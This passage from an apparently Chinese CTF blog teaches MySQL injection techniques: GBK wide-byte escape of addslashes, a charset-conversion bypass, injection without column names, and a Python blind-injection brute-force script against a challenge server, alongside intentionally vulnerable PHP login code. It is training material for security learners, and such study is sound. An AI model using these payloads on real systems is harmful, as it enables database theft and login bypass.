addslashes(@$_POST&#91;'password']);<\/code><\/pre>\n\n\n\n<p>\u9996\u5148\u8fd9\u91cc\u7684\u7f16\u7801\u88ab\u8bbe\u7f6e\u4e3a\u4e86gbk\uff0c\u5176\u6b21\u6211\u4eec\u4f7f\u7528\u4e86<code>addslashes<\/code>\u51fd\u6570\uff0c\u8fd9\u4e2a\u51fd\u6570\u4f1a\u5c06\u628aPOST\u63a5\u6536\u5230\u7684username\u4e0epassword\u7684\u90e8\u5206\u5b57\u7b26\u8fdb\u884c\u8f6c\u4e49\u5904\u7406\uff0c\u4f5c\u7528\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u5b57\u7b26<code>'\u3001\"\u3001\\<\/code>\u524d\u8fb9\u4f1a\u88ab\u6dfb\u52a0\u4e0a\u4e00\u6761\u53cd\u659c\u6760<code>\\<\/code>\u4f5c\u4e3a\u8f6c\u4e49\u5b57\u7b26\u3002 <\/li>\n\n\n\n<li>\u591a\u4e2a\u7a7a\u683c\u88ab\u8fc7\u6ee4\u6210\u4e00\u4e2a\u7a7a\u683c<\/li>\n<\/ul>\n\n\n\n<p>\u5982\u679c\u6211\u4eec\u8f93\u5165username=%df%27or%201=1%23&amp;password=123\uff0c\u7ecf\u8fc7addslashes\u51fd\u6570\u7684\u8f6c\u4e49\uff0c\u6700\u540e\u63a5\u6536\u5230\u7684payload\u4e3a(\u201c\\\u201d\u7684url\u7f16\u7801\u5c31\u662f%5c)\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>username=%df%5c%27or%201=1%23&amp;password=123<\/code><\/pre>\n\n\n\n<p>\u7ecf\u8fc7gbk\u89e3\u7801\u5f97\u5230\uff1a<code>username=\u904b'or 1=1#<\/code>\u3001<code>password=123<\/code>\uff0c\u62fc\u63a5\u5230SQL\u8bed\u53e5\u5f97\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>select * from users where username = '\u904b'or 1=1#' and password='123';<\/code><\/pre>\n\n\n\n<p>\u6700\u540e\u5373\u53ef\u6210\u529f\u541e\u6389\\\u6210\u529f\u9003\u9038\u5355\u5f15\u53f7\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u9632\u8303\u65b9\u6cd5<\/h3>\n\n\n\n<p>\u5148\u8c03\u7528mysql_set_charset\u51fd\u6570\u8bbe\u7f6e\u8fde\u63a5\u4f7f\u7528\u7684\u5b57\u7b26\u96c6\u4e3agbk\uff0c\u518d\u8c03\u7528mysql_real_escape_string\u51fd\u6570\u5bf9\u7528\u6237\u7684\u8f93\u5165\u8fdb\u884c\u8f6c\u4e49(\u8be5\u51fd\u6570\u6bd4addslashes\u51fd\u6570\u5b89\u5168)\u3002\u8fd9\u6837\u5f53\u7528\u6237\u8f93\u5165%df&#8217; \u5373 %df%5c \u65f6 mysql 
\u5c31\u4f1a\u628a\u4ed6\u76f4\u63a5\u7f16\u7801\u4e3a \u904b \uff0cmysql_real_escape_string\u51fd\u6570\u662f\u4e0d\u4f1a\u5bf9%5c\u518d\u6dfb\u52a0%5c\u8fdb\u884c\u8f6c\u4e49\u7684\uff0c\u8fd9\u6837\u5c31\u9884\u9632\u4f4f\u5bbd\u5b57\u8282\u6ce8\u5165\u4e86<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Mysql\u7f16\u7801\u8f6c\u6362<\/h2>\n\n\n\n<p>\u7f51\u7ad9\u6e90\u7801\u4e3a\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php\n$mysqli = new mysqli(\"localhost\", \"root\", \"root\", \"cat\");\n\nif ($mysqli-&gt;connect_errno) {\n    printf(\"Connect failed: %s\\n\", $mysqli-&gt;connect_error);\n    exit();\n}\n\n$mysqli-&gt;query(\"set names utf8\");\n\n$username = addslashes($_GET&#91;'username']);\n\nif($username === 'admin'){\n    die(\"You can't do this.\");\n}\n\n$sql = \"SELECT * FROM `table1` WHERE username='{$username}'\";\n\nif ($result = $mysqli-&gt;query( $sql )) {\n    printf(\"Select returned %d rows.\\n\", $result-&gt;num_rows);\n\n    while ($row = $result-&gt;fetch_array(MYSQLI_ASSOC))\n    {\n        var_dump($row);\n    }\n\n    $result-&gt;close();\n} else {\n    var_dump($mysqli-&gt;error);\n}\n\n$mysqli-&gt;close();\n?&gt;<\/code><\/pre>\n\n\n\n<p>\u5efa\u8868\u8bed\u53e5\u5982\u4e0b\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>CREATE TABLE `table1` (\n  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,\n  `username` varchar(255) COLLATE latin1_general_ci NOT NULL,\n  `password` varchar(255) COLLATE latin1_general_ci NOT NULL,\n  PRIMARY KEY (`id`)\n) ENGINE=MyISAM AUTO_INCREMENT=1 DEFAULT CHARSET=latin1 COLLATE=latin1_general_ci;<\/code><\/pre>\n\n\n\n<p>\u4e8b\u5b9e\u4e0a\u5373\u4f7f\u6211\u4eec\u4e0d\u8bbe\u7f6e\u7f16\u7801\u4e3alatin1\uff0c\u9ed8\u8ba4\u7f16\u7801\u4e5f\u662flatin1\u3002<\/p>\n\n\n\n<p>\u5982\u679c\u6211\u4eec\u60f3\u8981\u4f7f\u7528<code>insert table1 
VALUES(1,'admin','admin');<\/code>\u63d2\u5165\u4e00\u6761\u6570\u636e\uff0c\u7531\u4e8e\u5bf9\u4e8eadmin\u7684\u5224\u65ad\u6211\u4eec\u662f\u4e0d\u80fd\u6210\u529f\u6267\u884c\u7684<code>\u3002<\/code><\/p>\n\n\n\n<p>\u5bf9\u4e8esql\u800c\u8a00\uff0cset names utf8;\u76f8\u5f53\u4e8e\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>mysql&gt;SET character_set_client ='utf8';\nmysql&gt;SET character_set_results ='utf8';\nmysql&gt;SET character_set_connection ='utf8';<\/code><\/pre>\n\n\n\n<p>SQL\u8bed\u53e5\u4f1a\u5148\u8f6c\u6210<code>character_set_client<\/code>\u8bbe\u7f6e\u7684\u7f16\u7801\uff0c\u7136\u540e\u5b83\u8fd8\u4f1a\u7ee7\u7eed\u8f6c\u5316\uff0c<code>character_set_client<\/code>\u5ba2\u6237\u7aef\u5c42\u8f6c\u6362\u5b8c\u6bd5\u4e4b\u540e\uff0c\u6570\u636e\u5c06\u4f1a\u4ea4\u7ed9<code>character_set_connection<\/code>\u8fde\u63a5\u5c42\u5904\u7406\uff0c\u6700\u540e\u5728\u4ece<code>character_set_connection<\/code>\u8f6c\u5230\u6570\u636e\u8868\u7684\u5185\u90e8\u64cd\u4f5c\u5b57\u7b26\u96c6\uff0c\u5c31\u8fd9\u4e2a\u4f8b\u5b50\u800c\u8a00\uff0c\u987a\u5e8f\u4e3a\uff1a<code>UTF-8\u2014&gt;UTF-8-&gt;Latin1<\/code><\/p>\n\n\n\n<p>\u7531\u4e8e\u7f16\u7801\u7279\u6027\uff0c\u6211\u4eec\u5728\u8fd9\u91cc\u53ef\u4ee5\u8f93\u5165<code>?username=admin%c2<\/code>\uff0c<code>%c2<\/code>\u662f\u4e00\u4e2aLatin1\u5b57\u7b26\u96c6\u4e0d\u5b58\u5728\u7684\u5b57\u7b26\u3002\u5bf9\u4e8eUTF\u7f16\u7801\u800c\u8a00\uff0c%00-%7F\u53ef\u4ee5\u76f4\u63a5\u8868\u793a\u67d0\u4e2a\u5b57\u7b26\uff0c%C2-%F4\u4e0d\u53ef\u4ee5\u76f4\u63a5\u8868\u793a\u67d0\u4e2a\u5b57\u7b26\uff0c\u4ed6\u4eec\u53ea\u662f\u5176\u4ed6\u957f\u5b57\u8282\u7f16\u7801\u7ed3\u679c\u7684\u9996\u5b57\u8282\u3002\u8fd9\u91cc\u8fd8\u6709\u4e00\u4e2a\u70b9\uff0c\u90a3\u5c31\u662fMysql\u6240\u4f7f\u7528\u7684UTF-8\u7f16\u7801\u662f\u9609\u5272\u7248\u7684\uff0c\u4ec5\u652f\u6301\u4e09\u4e2a\u5b57\u8282\u7684\u7f16\u7801\uff0c\u56e0\u6b64Mysql\u91cc\u9996\u5b57\u8282\u8303\u56f4\u4e3a\uff1a<code>00-7F\u3001C2-EF<
\/code>\uff0c\u5bf9\u4e8e\u4e0d\u5b8c\u6574\u7684\u957f\u5b57\u8282UTF-8\u7f16\u7801\u7684\u5b57\u7b26\uff0c\u82e5\u8fdb\u884c\u5b57\u7b26\u96c6\u8f6c\u6362\u65f6\uff0c\u4f1a\u76f4\u63a5\u8fdb\u884c\u5ffd\u7565\u5904\u7406\u3002<\/p>\n\n\n\n<p>\u6240\u4ee5\u5728\u8fd9\u91cc\u6211\u4eec\u53ef\u4ee5\u8f93\u5165payload\uff1a<code>?username=admin%c2<\/code>\uff0c\u6b64\u5904\u7684<code>%c2<\/code>\u6362\u4e3a<code>%c2-%ef<\/code>\u5747\u53ef\uff0c\u6700\u540e\u63a5\u6536\u5230\u7684payload\u4e3a\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>SELECT * FROM `table1` WHERE username='admin'<\/code><\/pre>\n\n\n\n<p>\u56e0\u4e3a\u6700\u540e\u6267\u884c\u6bd4\u8f83<code>username='admin'<\/code>\u7684\u65f6\u5019\uff0c<code>'admin'<\/code>\u662f\u4e00\u4e2alatin1\u5b57\u7b26\u4e32\uff0c\u800cMysql\u5728\u6700\u540e\u8fdb\u884c\u4ece<code>UTF-8-&gt;Latin1<\/code>\u8fdb\u884c\u7f16\u7801\u8f6c\u6362\u65f6\uff0c\u5c31\u5c06\u4e0d\u5b8c\u6574\u7684\u5b57\u7b26\u7f16\u7801<code>%c2<\/code>\u5ffd\u7565\u4e86(<code>%c2-%ef<\/code>\u5747\u662f\u4e0d\u5b8c\u6574\u7f16\u7801)\u3002<\/p>\n\n\n\n<p>\u5177\u4f53\u53ef\u4ee5\u53c2\u8003p\u795e\u5199\u7684<a href=\"https:\/\/www.leavesongs.com\/PENETRATION\/mysql-charset-trick.html\">Mysql\u5b57\u7b26\u7f16\u7801\u5229\u7528\u6280\u5de7<\/a><\/p>\n\n\n\n<h1 class=\"wp-block-heading\">\u65e0\u5217\u540d\u6ce8\u5165<\/h1>\n\n\n\n<p>\u65e0\u5217\u540d\u6ce8\u5165\uff0c\u5373\u5728\u4e0d\u77e5\u9053\u5217\u540d\u7684\u60c5\u51b5\u4e0b\u8fdb\u884c sql \u6ce8\u5165\u3002\u6709\u65f6\u5019CTF\u91cc\u4f1a\u628ainformation_schema\u8fc7\u6ee4\u4e86\uff0c\u8ba9\u6211\u4eec\u53ea\u80fd\u60f3\u5176\u4ed6\u65b9\u6cd5\u83b7\u53d6\u8868\u540d\uff0c\u53c2\u8003<a href=\"https:\/\/www.cnblogs.com\/phant0m\/articles\/16450646.html\">\u65e0\u5217\u540d\u6ce8\u5165\u59ff\u52bf\u603b\u7ed3<\/a>\uff0c\u8fd9\u65f6\u6211\u4eec\u53ef\u4ee5\u5148\u5229\u7528\u5176\u4ed6\u5e93\u6216\u8005\u89c6\u56fe\u67e5\u8868\u540d\uff1a<\/p>\n\n\n\n<pre 
class=\"wp-block-code\"><code>mysql\uff1a\nmysql.innodb_table_stats\nmysql.innodb_index_stats\n\n\nsys\uff1a\nx$schema_table_statistics_with_buffer\nschema_table_statistics_with_buffer\n\n\u89c6\u56fe\uff1a\nschema_auto_increment_columns<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>select group_concat(table_name) from |mysql.innodb_table_stats|x$schema_table_statistics_with_buffer|schema_auto_increment_columns|<\/code><\/pre>\n\n\n\n<p>\u7136\u540e\u518d\u60f3\u529e\u6cd5\u65e0\u5217\u540d\u6ce8\u5165<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">union\u53d6\u522b\u540d<\/h2>\n\n\n\n<p>\u6bd4\u5982\u6211\u4eec\u53ef\u4ee5\u4f7f\u7528select 1,2 union select * from sheet1\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-16.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"564\" height=\"328\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-16.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1437\"  sizes=\"auto, (max-width: 564px) 100vw, 564px\" \/><\/div><\/figure>\n\n\n\n<p>\u53ef\u4ee5\u770b\u5230\u5217\u540d\u76f4\u63a5\u53d8\u62101\uff0c2\u4e86\uff0c\u7136\u540e\u6211\u4eec\u5c31\u53ef\u4ee5\u7528\u8fd9\u4e2a\u522b\u540d\u8fdb\u884csql\u67e5\u8be2\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>select `2` from (select 1,2 union select * from sheet1)a;<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div 
class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-17.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"617\" height=\"313\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-17.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1438\"  sizes=\"auto, (max-width: 617px) 100vw, 617px\" \/><\/div><\/figure>\n\n\n\n<p>\u6ce8\u610f\uff0c\u8fd9\u4e2a1\u662f\u5fc5\u987b\u52a0&#8220;\u7684\uff0c\u5176\u6b21from\u540e\u9762\u7684\u8bed\u53e5\u662f\u4e00\u4e2a\u6574\u4f53\uff0c\u6240\u4ee5\u8981\u7528\u62ec\u53f7\u62ec\u8d77\u6765\uff0c\u800c\u540e\u9762\u90a3\u4e2aa\uff0c\u76f8\u5f53\u4e8e\u662f\u62ec\u53f7\u91cc\u8bed\u53e5\u7684\u522b\u540d\u76f8\u5f53\u4e8e as a,\u53ef\u4ee5\u968f\u4fbf\u8d77\u540d;<\/p>\n\n\n\n<p>\u6709\u65f6\u5019&#8220;\u4f1a\u88abban\u6389\uff0c\u6211\u4eec\u53ef\u4ee5\u7ee7\u7eed\u53d6\u522b\u540d\u6765\u67e5\u8be2\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>select GROUP_CONCAT(c) from (select 1 as b,2 as c union select * from sheet1)a<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-18.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  
loading=\"lazy\" decoding=\"async\" width=\"730\" height=\"260\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-18.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1439\"  sizes=\"auto, (max-width: 730px) 100vw, 730px\" \/><\/div><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">\u5229\u7528join\u7206\u5217\u540d<\/h2>\n\n\n\n<p>\u5728\u524d\u9762\u62a5\u9519\u6ce8\u5165\u91cc\u7684mysql\u5217\u540d\u91cd\u590d\u62a5\u9519\u63d0\u5230\u8fc7\u4e86\uff0c\u4e0d\u8fc7\u8fd9\u79cd\u6280\u5de7\u9700\u8981\u5f00\u542f\u62a5\u9519\u624d\u884c\uff0c\u672c\u8d28\u662f\u62a5\u9519\u6ce8\u5165\u3002<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u5b57\u7b26\u6bd4\u8f83\u76f2\u6ce8<\/h2>\n\n\n\n<p>\u5728sql\u91cc\uff0c\u4e24\u4e2a\u5b57\u7b26\u4e32\u7684\u5927\u5c0f\u4e0e\u5b57\u7b26\u4e32\u7684\u957f\u5ea6\u662f\u6ca1\u6709\u5173\u7cfb\u7684\uff0c\u7ed9\u5b9a\u4e24\u4e2a\u5b57\u7b26\u4e32\uff0c\u4f1a\u5404\u53d6\u4e24\u4e2a\u5b57\u7b26\u4e32\u7684\u9996\u5b57\u7b26ascii\u7801\u6765\u6bd4\u8f83\uff0c\u4e0d\u7b49\u5f0f\u6210\u7acb\u8fd4\u56de1\uff0c\u4e0d\u7b49\u5f0f\u4e0d\u6210\u7acb\u8fd4\u56de0\u3002<\/p>\n\n\n\n<p>\u8fd9\u91cc\u5c31ascii\u7801\u800c\u8a00\uff0cg&gt;f\u6240\u4ee5\u8fd4\u56de1<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-19.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"588\" height=\"254\" 
data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-19.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1447\"  sizes=\"auto, (max-width: 588px) 100vw, 588px\" \/><\/div><\/figure>\n\n\n\n<p>\u5982\u679c\u76f8\u7b49\u6216\u8005\u5c0f\u4e8e\u5219\u8fd4\u56de\u96f6\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-20.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"454\" height=\"244\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-20.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1448\"  sizes=\"auto, (max-width: 454px) 100vw, 454px\" \/><\/div><\/figure>\n\n\n\n<p>\u5229\u7528\u8fd9\u4e2a\u7279\u6027\uff0c\u5c31\u53ef\u4ee5\u9010\u5b57\u7b26\u7206\u7834\u6570\u636e\uff0c\u5f53\u7136\uff0c\u5982\u679c\u56e0\u4e3a\u5728\u76f8\u7b49\u65f6\u8fd4\u56de<strong>0<\/strong>\uff0c\u6240\u4ee5\u5728\u8fdb\u884c\u7206\u7834\u65f6\uff0c\u6211\u4eec\u7206\u7834\u51fa\u6765\u7684<strong>1<\/strong>\u7684\u65f6\u5019\uff0c\u662f\u6bd4\u6b63\u786e\u5b57\u7b26\u8981\u59271\u7684\uff0c\u6240\u4ee5\u5728\u7f16\u5199\u811a\u672c\u65f6\uff0c\u6211\u4eec\u8981<strong>-1<\/strong>\u624d\u80fd\u5f97\u5230\u6b63\u786e\u5b57\u7b26\u3002<\/p>\n\n\n\n<p>\u4ee5<a 
href=\"https:\/\/blog.csdn.net\/weixin_45646006\/article\/details\/120073020\">[GYCTF2020]Ezsqli<\/a>\u8fd9\u9053\u9898\u4e3a\u4f8b\uff0c\u8fd9\u4e2a\u9898\u6211\u4eec\u53ef\u4ee5\u5148\u7528sys.schema_table_statistics_with_buffer\u6216sys.x$schema_table_statistics_with_buffer\u4ee3\u66ffinformation_schema.tables\uff0c\u83b7\u5f97\u5217\u540df1ag_1s_h3r3_hhhhh\uff0c\u7136\u540e\u6211\u4eec\u53ef\u4ee5\u5224\u65ad\u5b57\u6bb5\u6570\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u8f93\u5165<code>2||((select 1,1)&gt;(select * from f1ag_1s_h3r3_hhhhh))<\/code>\uff0c\u53d1\u73b0\u7f51\u9875\u8f93\u51fa<code>Nu1L<\/code><\/li>\n\n\n\n<li>\u8f93\u5165<code>2||((select 1,1,1)&gt;(select * from f1ag_1s_h3r3_hhhhh))<\/code>\uff0c\u53d1\u73b0\u7f51\u9875\u8f93\u51fa<code>bool(false)<\/code><\/li>\n<\/ul>\n\n\n\n<p>\u56e0\u6b64\u53ea\u6709\u4e24\u4e2a\u5217\uff0c\u7136\u540e\u6211\u4eec\u53ef\u4ee5\u5206\u5f00\u6ce8\u5165\u4e24\u4e2a\u5217\u7684\u503c\uff0c\u7ed9\u4e00\u4e2a\u811a\u672c\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>import requests\nimport time\nOriginal_url = \"http:\/\/e78d520e-a527-4dc7-9262-5997951db6c3.node4.buuoj.cn:81\/index.php\"\nSuccess_message = &#91;\"Nu1L\",\"V&amp;N\"]\ndata = {\"id\": \"\"}\ntable_name_payload = \"2||(select ascii(substr(group_concat(table_name),{},1)) from sys.x$schema_table_statistics_with_buffer where table_schema=database())&gt;{}\"\ncolumn_1_payload = '2||((select \"{}\",1)&gt;(select * from {}))'\ncolumn_2_payload = '2||((select 1,\"{}\")&gt;(select * from {}))'\n\ndef getname(payload):\n    name = ''\n    for i in range(1, 100):\n        begin = 32\n        end = 126\n        mid = (begin + end) \/\/ 2\n        while begin &lt; end:\n            data&#91;\"id\"] = payload.format(i,mid)\n            RowText = requests.post(Original_url, data=data)\n            if Success_message&#91;0] in RowText.text:\n                begin = mid + 1\n            else:\n                end = mid\n            mid = (begin + 
end) \/\/ 2\n        if (mid == 32):\n            print()\n            break\n        name += chr(mid)\n        print(\"\\r\u8868\u540d: \" + name, end=\"\")\n\ndef GetData(table_name, column_payload):\n    flag = ''\n    for i in range(1, 100): #\u6570\u636e\u7684\u7b2ci\u4f4d\n        time.sleep(0.3) #\u6682\u505c\n        begin = 32\n        end = 126\n        mid = (begin + end) \/\/ 2 #\u53d6\u6574\u9664\uff0c\u8fd4\u56de\u5546\u7684\u6574\u6570\u90e8\u5206\uff08\u5411\u4e0b\u53d6\u6574\uff09\n        while begin &lt; end:\n            tmp = flag + chr(mid)\n            data&#91;\"id\"] = column_payload.format(tmp, table_name)\n            RowText = requests.post(Original_url, data=data)\n            if Success_message&#91;1] in RowText.text: # \u8fd9\u91cc\u7528V&amp;N\u5224\u65ad\n                begin = mid + 1\n            else:\n                end = mid\n            mid = (begin + end) \/\/ 2\n        if (mid == 33):\n            print()\n            break\n        flag += chr(mid - 1)\n        print((\"\\r\u8868%s\u7684\u6570\u636e: \" + flag.lower()) % (table_name), end=\"\")\n\ngetname(table_name_payload)\nGetData(\"f1ag_1s_h3r3_hhhhh\", column_1_payload)\nGetData(\"f1ag_1s_h3r3_hhhhh\", column_2_payload)<\/code><\/pre>\n\n\n\n<p>\u8fd9\u91cc\u5c31\u662f\u7528\u7684((select 1,&#8221;{}&#8221;)&gt;(select * from 
f1ag_1s_h3r3_hhhhh))\uff0c\u901a\u8fc7\u4e00\u4f4d\u4e00\u4f4d\u7684\u589e\u52a0\u786e\u5b9a\u54ea\u4e2a\u5b57\u7b26\u662f\u6b63\u786e\u7684\uff0c\u8fd9\u4e2apayload\u7684\u610f\u601d\u5c31\u662ff1ag_1s_h3r3_hhhhh\u7b2c\u4e8c\u4e2a\u5b57\u6bb5\u7684\u6570\u636e\u6bcf\u4e00\u4e2a\u5b57\u7b26\u4e0eF\u8fd9\u4e2a\u5b57\u7b26\u4e32\u6bcf\u9694\u4e00\u4e2a\u5b57\u7b26\u6bd4\u8f83\u5927\u5c0f\uff0c\u5982\u679cF\u6bd4\u8f83\u5927\uff0c\u5c31\u8fd4\u56deTrue\uff0c\u90a3\u4e2a1\u5c31\u662f\u7528\u6765\u5360\u4f4d\u7684\uff0c\u4ee5\u6b64\u7c7b\u63a8\uff0c\u4e0d\u65ad\u589e\u52a0\u5b57\u7b26\u4e32\u957f\u5ea6\uff0c\u5c31\u53ef\u4ee5\u5f97\u5230\u5b8c\u6574\u7684\u6570\u636e\u3002<\/p>\n\n\n\n<h1 class=\"wp-block-heading\">\u7ea6\u675f\u653b\u51fb<\/h1>\n\n\n\n<p>\u8fd9\u91cc\u5c31\u7528\u6211\u6284\u7684\u4f8b\u5b50\u6765\u8bba\u8ff0\u8fd9\u79cd\u653b\u51fb\u65b9\u5f0f\uff0c\u6211\u4eec\u5148\u521b\u4e00\u4e2a\u8868\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>CREATE TABLE users(\n    username varchar(20),\n    password varchar(20)\n)<\/code><\/pre>\n\n\n\n<p>\u6ce8\u518c\u5224\u65ad\u4ee3\u7801\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php\n$conn = mysqli_connect(\"127.0.0.1:3307\", \"root\", \"root\", \"db\");\nif (!$conn) {\n    die(\"Connection failed: \" . mysqli_connect_error());\n}\n$username = addslashes(@$_POST&#91;'username']);\n$password = addslashes(@$_POST&#91;'password']);\n$sql = \"select * from users where username = '$username'\";\n$rs = mysqli_query($conn,$sql);\nif($rs-&gt;fetch_row()){\n    die('\u8d26\u53f7\u5df2\u6ce8\u518c');\n}else{\n    $sql2 = \"insert into users values('$username','$password')\";\n    mysqli_query($conn,$sql2);\n    die('\u6ce8\u518c\u6210\u529f');\n}\n?&gt;<\/code><\/pre>\n\n\n\n<p>\u767b\u5f55\u5224\u65ad\u4ee3\u7801\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php\n$conn = mysqli_connect(\"127.0.0.1:3307\", \"root\", \"root\", \"db\");\nif (!$conn) {\n    die(\"Connection failed: \" . 
mysqli_connect_error());\n}\n$username = addslashes(@$_POST&#91;'username']);\n$password = addslashes(@$_POST&#91;'password']);\n$sql = \"select * from users where username = '$username' and password='$password';\";\n$rs = mysqli_query($conn,$sql);\nif($rs-&gt;fetch_row()){\n    $_SESSION&#91;'username']=$password;\n}else{\n    echo 